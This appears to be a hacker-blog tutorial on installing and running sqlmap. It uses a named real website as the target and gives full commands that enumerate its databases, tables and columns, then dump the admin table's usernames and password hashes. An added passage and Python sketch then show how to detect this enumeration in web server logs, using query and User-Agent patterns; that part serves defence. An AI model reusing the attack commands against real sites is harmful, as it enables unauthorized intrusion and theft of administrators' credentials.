Pranaam to all bhai ji _/\_
Today we will learn how to use sqlmap on a Linux system where it is not already installed.
On penetration-testing Linux distributions like BackTrack, BackBox and Blackbuntu, sqlmap comes preinstalled,
but you can easily use sqlmap on other systems too :)
How??? OK, follow these steps, it's really not a big deal ;)
The official sqlmap website, from where you can download the sqlmap source code:
http://sqlmap.org/
Download link:
https://github.com/sqlmapproject/sqlmap/zipball/master
The sqlmap source code gets saved with the name master.
It's a zip file; to extract its contents, run the command: unzip master
You will get a directory named something like sqlmap project; enter that directory and list the files.
Yesssss :) Here is our sqlmap source code.
sqlmap is written in Python, and sqlmap.py is the main file, which is used for performing SQL injection.
So let's start >:D<
You can run sqlmap.py in 2 ways: either using python or using ./ ;)
python sqlmap.py option
./sqlmap.py option
If the sqlmap.py file has execute permission, you can run sqlmap using ./
To list the available options for sqlmap, supply the -h option,
like this:
./sqlmap.py -h
Here is the link where you can find the options:
https://github.com/sqlmapproject/sqlmap/wiki/Usage
For example, I want to extract the database of a website vulnerable to SQL injection using sqlmap.
The website link is http://www.iapex.com.pk/messages.php?id=4
The command will be
./sqlmap.py -u http://www.iapex.com.pk/messages.php?id=4 --dbs
Here -u stands for the URL that is vulnerable to SQL injection and
--dbs stands for databases \ ^_^ /
When you run this command, sqlmap will start injecting this URL and will extract the database names.
After the process completes, you will get results like this
Now, if you want to get the list of tables in a database, you will need to specify the database name:
./sqlmap.py -u website.com/vulnerable.php?id=4 -D database_name --tables
In my case I am going for the database named iapexcom_new,
so the command will be
./sqlmap.py -u http://www.iapex.com.pk/messages.php?id=4 -D iapexcom_new --tables
Here -D stands for the database that is to be enumerated.
We have 2 databases, and we can enumerate tables from either of them.
In the above command we are enumerating the table list of the database iapexcom_new.
After the process completes, sqlmap will show the list of tables in that database
and so on :)
As we know,
a database has tables and every table has columns.
Columns contain the information/data.
So when performing SQL injection using sqlmap, first we extract the database names, then the list of tables from a database.
After extracting the table names, we select a table and extract the list of columns in that table,
and then we can get the information stored in those columns.
Let's extract the columns from a table of the database ;)
I am going for the table es_admin because this table contains the columns which have the username and password of the website admin stored in them :P
./sqlmap.py -u website.com/vulnerable.php?id=4 -D database_name -T table_name --columns
ok
The command will be
./sqlmap.py -u http://www.iapex.com.pk/messages.php?id=4 -D iapexcom_new -T es_admin --columns
The meaning of this command is:
inject the website URL (-u) http://www.iapex.com.pk/messages.php?id=4, whose database name (-D) is iapexcom_new and table name (-T) is es_admin, and extract the names of the columns from that table.
Wait a few minutes until sqlmap extracts the column names from the table es_admin.
It will show a result like this
OK, now we have the column names too, let's go and extract the data stored in these columns :P
The command will be
./sqlmap.py -u website.com/vulnerable.php?id=4 -D database_name -T table_name -C column_name --dump
The command in my case:
./sqlmap.py -u http://www.iapex.com.pk/messages.php?id=4 -D iapexcom_new -T es_admin -C username,password --dump
After the process completes, you will get a result like this
You're done >:D< You can see the username and password hash, which are stored in the table 'es_admin' in the columns named username and password.
This is how you can use sqlmap on a Linux OS where it is not already installed :)
enjoy
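For whoever runs the web server on the receiving end, the order described above (databases, then tables, then columns, then dump) leaves a recognizable trail in the access log. The Python sketch below is an added example, not part of the original post: it flags that sequence per client, assuming a MySQL back end and combined log format; the function names, the /item.php path and the log lines (documentation IP addresses, placeholder tool version) are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Combined log format: capture client IP, request target and User-Agent.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d+ \S+ "[^"]*" "([^"]*)"')

# Phases in the order the tutorial walks through them (MySQL catalog names; assumption).
PHASES = [
    ("databases", re.compile(r"information_schema\.schemata", re.I)),
    ("tables", re.compile(r"information_schema\.tables", re.I)),
    ("columns", re.compile(r"information_schema\.columns", re.I)),
    ("dump", re.compile(r"\bselect\b.+\bfrom\s+(?!information_schema)\w+\.\w+", re.I)),
]

# Constructed sample log lines, not captured traffic.
SAMPLE_LOG = """
198.51.100.7 - - [10/Oct/2023:13:55:01 +0000] "GET /item.php?id=4%20UNION%20ALL%20SELECT%20schema_name%20FROM%20information_schema.schemata HTTP/1.1" 200 512 "-" "sqlmap/1.x#stable (https://sqlmap.org)"
198.51.100.7 - - [10/Oct/2023:13:56:10 +0000] "GET /item.php?id=4%20UNION%20ALL%20SELECT%20table_name%20FROM%20information_schema.tables%20WHERE%20table_schema=%27shop%27 HTTP/1.1" 200 640 "-" "sqlmap/1.x#stable (https://sqlmap.org)"
198.51.100.7 - - [10/Oct/2023:13:57:22 +0000] "GET /item.php?id=4%20UNION%20ALL%20SELECT%20column_name%20FROM%20information_schema.columns%20WHERE%20table_name=%27users%27 HTTP/1.1" 200 600 "-" "sqlmap/1.x#stable (https://sqlmap.org)"
198.51.100.7 - - [10/Oct/2023:13:58:40 +0000] "GET /item.php?id=4%20UNION%20ALL%20SELECT%20username,password%20FROM%20shop.users HTTP/1.1" 200 700 "-" "sqlmap/1.x#stable (https://sqlmap.org)"
203.0.113.9 - - [10/Oct/2023:14:00:00 +0000] "GET /item.php?id=4 HTTP/1.1" 200 300 "-" "Mozilla/5.0"
203.0.113.20 - - [10/Oct/2023:14:05:00 +0000] "GET /item.php?id=7%20UNION%20ALL%20SELECT%20table_name%20FROM%20information_schema.tables HTTP/1.1" 200 640 "-" "Mozilla/5.0"
"""

def classify(target):
    """Return the enumeration phase a request's query string belongs to, or None."""
    query = unquote_plus(target.partition("?")[2])
    for name, pattern in PHASES:
        if pattern.search(query):
            return name
    return None

def scan(log_text):
    """Map each suspicious client IP to the phases seen (first-seen order) and a tool-UA flag."""
    report = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, target, agent = m.groups()
        phase = classify(target)
        tool = agent.lower().startswith("sqlmap/")  # default UA; easily changed by the client
        if phase is None and not tool:
            continue
        entry = report.setdefault(ip, {"phases": [], "sqlmap_ua": False})
        entry["sqlmap_ua"] = entry["sqlmap_ua"] or tool
        if phase and phase not in entry["phases"]:
            entry["phases"].append(phase)
    return report
```

Because the User-Agent can be changed, the payload patterns carry the detection; the second flagged client in the sample is caught on its query string alone.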
Thank you :)
Greetz to :- Guru ji Zero , code breaker ica, Aasim shaikh,Reborn, Raman kumar rana,INX_r0ot,Darkwolf indishell, Chinmay Pandya,L0rd Crus4d3r,Hackuin ,Silent poison India,Magnum sniper,Atul Dwivedi,ethicalnoob Indishell,Local root indishell,Irfninja indishell Hardeep bhai,Mannu,Viki and AR AR bhai ji <3